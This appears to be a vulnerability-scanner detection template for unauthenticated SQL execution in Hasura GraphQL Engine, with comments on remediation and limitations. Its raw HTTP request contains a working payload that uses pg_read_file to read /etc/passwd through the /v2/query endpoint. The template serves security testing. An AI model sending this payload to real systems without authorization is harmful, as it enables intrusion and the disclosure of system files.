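id: hasura-graphql-psql-exec

# Detection template: sends one 'run_sql' statement to the Hasura
# '/v2/query' API without credentials and checks whether it was executed.
# NOTE(review): presumably the endpoint answers unauthenticated requests
# only when no admin secret (HASURA_GRAPHQL_ADMIN_SECRET) is configured;
# confirm against the reference. Remediation for a hit is to set an admin
# secret and keep the API off untrusted networks.
info:
  author: Udyz
  name: Hasura GraphQL Engine - postgresql query exec
  severity: critical
  description: A vulnerability in Hasura GraphQL Engine allows remote unauthenticated users to execute arbitrary SQL statements via the '/v2/query' endpoint.
  reference: https://www.exploit-db.com/exploits/49802
  tags: hasura,rce

requests:
  # The blank line inside the raw request separates the HTTP headers from
  # the JSON body; without it the body would be read as header lines.
  # 'read_only' is set to true because the probe is a single SELECT, so the
  # check runs in a read-only transaction on the scanned system.
  # Limitation: pg_read_file only succeeds when the database role may read
  # server files and the database host has /etc/passwd, so a negative result
  # does not prove the endpoint is protected.
  - raw:
      - |
        POST /v2/query HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "type": "bulk",
          "source": "default",
          "args": [
            {
              "type": "run_sql",
              "args": {
                "source": "default",
                "sql": "SELECT pg_read_file('/etc/passwd',0,100000);",
                "cascade": false,
                "read_only": true
              }
            }
          ]
        }

    # Require both matchers: a passwd-style line on an error page or an
    # unrelated response should not be reported as a finding.
    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body

      - type: status
        status:
          - 200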